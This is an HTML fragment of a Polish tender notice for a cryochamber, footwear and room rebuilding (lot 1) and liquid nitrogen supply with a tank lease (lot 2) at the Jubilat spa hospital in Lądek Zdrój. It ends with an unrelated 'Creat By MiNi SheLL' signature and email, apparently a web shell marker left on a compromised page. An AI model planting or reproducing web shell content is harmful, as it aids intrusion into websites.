<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa, montaż i uruchomienie kriokomory, dostawę obuwia ochronnego oraz przebudowa części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:-  dostawę, montaż i  uruchomienie 2-3 osobowej kriokomory w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju przy ul. Wolności 4a (opis zawiera zał. nr 3 do SIWZ). Montaż obejmuje wykonanie wszystkich niezbędnych prac instalacyjnych zgodnie z projektem Zamawiającego. Poprzez uruchomienie rozumie się przyłączenie zamontowanej w pomieszczeniu kriokomory do zbiornika kriogenicznego za pomocą instalacji łączącej komorę ze zbiornikiem. W ramach przedmiotu zamówienia Wykonawca również przeszkoli personel w siedzibie Zamawiającego.
-  dostawę obuwia ochronnego (opis zawiera zał. nr 3 do SIWZ).
- przebudowę części pomieszczeń w Szpitalu Uzdrowiskowym Jubilat w Lądku Zdroju. Przebudowa dotyczy pomieszczeń  nr  20, 21, i 22 (zaznaczone kolorem - zał. nr 2b do SIWZ) oraz wykonanie fundamentu pod zbiornik azotu,  przejścia przez hol z przewodami łączącymi kriokomorę ze zbiornikiem oraz zasilania zbiornika azotu. Szczegółowy opis przedmiotu zamówienia w zakresie przebudowy pomieszczeń określają załączniki do Specyfikacji Istotnych Warunków Zamówienia:
1.	Przedmiar robót - zał. nr 2,
2.	Projekt zagospodarowania terenu- zał. nr 2a,
3.	PT Architektura - zał. nr 2b,
4.	PT instalacje sanitarne - zał. nr 2c,
5.	PT instalacje elektryczne - zał. nr 2d,
6.	Specyfikacja techniczna wykonania i odbioru robót - ogólna i budowlana - zał. nr 2e,
7.	Specyfikacja techniczna wykonania i odbioru robót - branża  sanitarna- zał. nr 2f,
8.	Specyfikacja techniczna wykonania i odbioru robót elektrycznych i elektroenergetycznych - zał. nr 2g.
Przedstawione powyżej dokumenty dotyczą całego zamierzenia inwestycyjnego, jakie planuje Zamawiający, jednak niniejsze postępowanie dotyczy wyłącznie zakresu prac wskazanego w akapicie poprzedzającym, zgodnie z opisem określonym w zał. nr 2 do SIWZ.
 Zamawiający dopuszcza ujęcie w ofercie, a następnie zastosowanie innych materiałów                     niż podane w dokumentacji projektowej pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji. Pod pojęciem parametry rozumie się funkcjonalność, przeznaczenie, kolorystykę, strukturę, materiały, kształt, wielkość, bezpieczeństwo i wytrzymałość.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 45.10.00.00-8, 45.11.12.20-6, 45.26.25.20-2, 45.41.00.00-4, 45.43.21.20-1, 45.43.12.00-9, 45.44.21.00-8, 45.33.12.10-1, 45.42.10.00-4, 45.23.24.60-4, 45.31.00.00-3, 45.33.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy azotu ciekłego wraz z dzierżawą zbiornika.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
- sukcesywne dostawy ciekłego azotu do Szpitala Uzdrowiskowego Jubilat oraz dzierżawę zbiornika kriogenicznego. Opis przedmiotu zamówienia zawiera zał.  nr 3c do SIWZ.
- dostawa-transport, instalacja i dzierżawa zbiornika na azot ciekły o pojemności około 6000 litrów. Zbiornik fabrycznie nowy o wymiarach około wysokość 580 cm, średnica 180 cm, ma być posadowiony na fundamencie wykonanym zgodnie z dokumentacją projektową, będącą załącznikiem do SIWZ. Wymagane jest załączenie karty oferowanego zbiornika.

1. Przewidywana ilość dostaw ciekłego azotu do zasilania kriokomory ok. 120 000 kg w okresie obowiązywania umowy. Ilości ciekłego azotu podane w formularzu cenowym stanowiącym załącznik nr 1b do SIWZ  przyjęte zostały na podstawie planowanego zużycia w okresie 24 miesięcy i mogą one ulec zmianie w trakcie obowiązywania umowy.
Zamawiający zaleca dokonanie wizji lokalnej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.61.00.00-9, 51.81.00.00-3, 24.11.18.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com